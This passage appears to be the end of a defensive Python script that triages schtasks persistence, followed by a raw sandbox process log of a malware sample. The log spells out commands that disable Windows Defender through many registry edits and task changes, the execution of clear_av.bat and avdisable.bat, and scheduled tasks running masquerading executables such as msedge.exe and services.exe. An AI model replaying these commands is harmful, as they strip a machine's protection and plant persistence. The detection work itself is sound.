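            sw[tok.lower()] = "" if nxt.startswith("/") else nxt
    if "/create" not in sw:
        return None
    return {
        "name": sw.get("/tn", ""),
        "schedule": sw.get("/sc", "").upper(),
        "modifier": sw.get("/mo", ""),
        "target": sw.get("/tr", "").strip("'"),  # the lines above wrap the path in '...'
        "highest": sw.get("/rl", "").upper() == "HIGHEST",
    }


def assess_task(task):
    """Flag masquerading, beacon-like intervals and elevation on one parsed task."""
    flags = []
    directory, _, image = task["target"].lower().rpartition("\\")
    if image in EXPECTED_DIRS:
        allowed = EXPECTED_DIRS[image]
        if not any(directory == p or directory.startswith(p + "\\") for p in allowed):
            flags.append(f"masquerade: {image} outside {', '.join(allowed) or '(no legitimate location)'}")
    if task["schedule"] == "MINUTE" and task["modifier"].isdigit() \
            and int(task["modifier"]) <= SHORT_INTERVAL_MINUTES:
        flags.append(f"respawn every {task['modifier']} min")
    if task["highest"]:
        flags.append("runs with /rl HIGHEST")
    return flags


def is_localhost_sleep(cmdline):
    """w32tm /stripchart against localhost is a timing primitive, not time sync."""
    t = [x.lower() for x in tokenize(cmdline)]
    return bool(t) and t[0].rsplit("\\", 1)[-1] in ("w32tm", "w32tm.exe") \
        and "/stripchart" in t and "/computer:localhost" in t


def triage(cmdlines):
    """Return (flagged tasks as (name, target, flags), count of localhost sleeps)."""
    findings, sleeps = [], 0
    for line in cmdlines:
        task = parse_schtasks_create(line)
        if task:
            flags = assess_task(task)
            if flags:
                findings.append((task["name"], task["target"], flags))
        elif is_localhost_sleep(line):
            sleeps += 1
    return findings, sleeps


if __name__ == "__main__":
    found, sleeps = triage(SAMPLE_CMDLINES)
    for name, target, flags in found:
        print(f"{name:16s} {target}\n    " + "; ".join(flags))
    print(f"localhost w32tm sleeps: {sleeps}")
```

The masquerade rule deliberately keys on the image name rather than the task name, since the task names here ("SppExtComObjS", "RuntimeBrokerR") differ from the image by one appended letter and would slip past a name-only match; the benign DAILY task in Program Files produces no flags.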
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\timeout.exe
timeout /t 6 /nobreak
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\timeout.exe
timeout /t 6 /nobreak
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc54b846f8,0x7ffc54b84708,0x7ffc54b84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\45aGjaybPu.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HcCr6nEVp7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\msedge.exe'" /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\it-IT\msedge.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6GXVlfePFq.bat"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
